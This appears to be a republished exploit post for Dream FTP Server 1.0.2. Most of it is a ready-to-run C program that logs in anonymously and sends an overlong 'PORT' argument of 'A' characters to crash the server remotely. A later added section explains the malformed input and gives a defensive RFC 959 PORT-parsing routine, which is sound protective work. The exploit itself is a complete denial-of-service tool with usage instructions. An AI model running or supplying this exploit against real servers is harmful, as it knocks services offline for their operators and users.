DREAM FTP Server 1.0.2 (PORT) Remote Denial of Service Exploit
Source: vfocus.net  Author: InTeL  Published: 2006-12-22

/*
=============================================================
DREAM FTP Server 1.0.2 (PORT) Denial of Service Exploit
=============================================================
Discovered by: InTeL
*Tested on DREAM FTP v1.02 on Windows XP SP2*

Dream FTP v1.02 also has anonymous logins enabled by default
which enables anyone to crash the server at will.
But if the anonymous logins have been disabled, try it with
another user/pass account

Shoutz: bryan@top-notch.ws , Digerati, Erazerz, everyone else u kno who u are
*/

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib,"wsock32.lib")

int usage(char *);

int usage(char *filename)
{
    printf("Dream FTP v1.02 DoS exploit\r\n");
    printf("By InTeL\r\n");
    printf("USAGE: %s <IP_Address> <port>\r\n", filename);

    exit(0);
}

int main(int argc, char *argv[])
{
    char evilbuf[40], recvbuf[1028];
    unsigned short port;
    struct sockaddr_in saddr;
    struct hostent *he;
    WSADATA wsaData;
    SOCKET sock;
    int i; /* declared at function scope so every loop below can use it */

    if (argc != 3)
        usage(argv[0]);

    port = atoi(argv[2]);
    if (WSAStartup(MAKEWORD(2,2), &wsaData) != 0) {
        printf("Unable to initialize Winsock \n");
        exit(1);
    }

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
        printf("Socket Error \n");
        exit(1);
    }

    if ((he = gethostbyname(argv[1])) == NULL) {
        printf("Couldnt Resolve %s \n", argv[1]);
        exit(1);
    }

    memset(&saddr, 0, sizeof(saddr));
    saddr.sin_family = AF_INET;
    saddr.sin_addr = *((struct in_addr *)he->h_addr);
    saddr.sin_port = htons(port);

    if (connect(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR) {
        printf("Connect Error \n");
        exit(1);
    }

    /* Read the server banner */
    for (i = 0; i < 3; i++) {
        memset(recvbuf, 0, sizeof(recvbuf));
        recv(sock, recvbuf, 1027, 0);
    }
    printf("Logging in\r\n");

    memset(evilbuf, 0, sizeof(evilbuf));
    strcpy(evilbuf, "USER Anonymous\r\n"); //USER
    send(sock, evilbuf, strlen(evilbuf), 0);

    for (i = 0; i < 4; i++) {
        memset(recvbuf, 0, sizeof(recvbuf));
        recv(sock, recvbuf, 1027, 0);
    }

    memset(evilbuf, 0, sizeof(evilbuf));
    strcpy(evilbuf, "PASS Anonymous\r\n"); //PASS
    send(sock, evilbuf, strlen(evilbuf), 0);

    for (i = 0; i < 3; i++) {
        memset(recvbuf, 0, sizeof(recvbuf));
        recv(sock, recvbuf, 1027, 0);
    }
    printf("Building overflow string\r\n");

    /* "PORT " followed by 31 'A' characters and CRLF */
    memset(evilbuf, 0, sizeof(evilbuf));
    strcpy(evilbuf, "PORT "); //PORT
    for (i = 5; i != 36; i++)
        evilbuf[i] = 'A';
    strcat(evilbuf, "\r\n");

    send(sock, evilbuf, strlen(evilbuf), 0);

    printf("DoS Attack Done\r\n");
    closesocket(sock);

    return 0;
}
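
The PoC above sends PORT followed by 31 'A' characters instead of the h1,h2,h3,h4,p1,p2 argument that RFC 959 defines. The following server-side check rejects that input before it reaches any address-parsing code; it is an added example, not part of the original post and not Dream FTP's code, and the function name parse_port_command is hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not Dream FTP code): strictly parse an FTP PORT
 * command of the RFC 959 form "PORT h1,h2,h3,h4,p1,p2", each field 0..255.
 * Returns 0 and fills out[6] on success, -1 on any malformed input. */
int parse_port_command(const char *line, unsigned char out[6])
{
    const char *p;
    int field = 0;

    if (line == NULL || strncmp(line, "PORT ", 5) != 0)
        return -1;
    p = line + 5;

    while (field < 6) {
        unsigned int value = 0;
        int digits = 0;
        /* Accept 1 to 3 decimal digits only; letters such as 'A' fail here. */
        while (*p >= '0' && *p <= '9') {
            if (++digits > 3)
                return -1;
            value = value * 10 + (unsigned int)(*p - '0');
            p++;
        }
        if (digits == 0 || value > 255)
            return -1;
        out[field++] = (unsigned char)value;

        if (field < 6) {
            if (*p != ',')
                return -1;
            p++;
        }
    }
    /* Nothing may follow the sixth field except the line terminator. */
    if (strcmp(p, "\r\n") != 0 && *p != '\0')
        return -1;
    return 0;
}

int main(void)
{
    unsigned char a[6];
    /* Constructed inputs: one valid command and the shape sent by the PoC. */
    printf("%d\n", parse_port_command("PORT 192,168,0,10,7,138\r\n", a));
    printf("%d\n", parse_port_command("PORT AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n", a));
    return 0;
}
```

A server would reply with a 501 syntax error whenever the function returns -1 and only then hand the six validated bytes to its data-connection code.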



 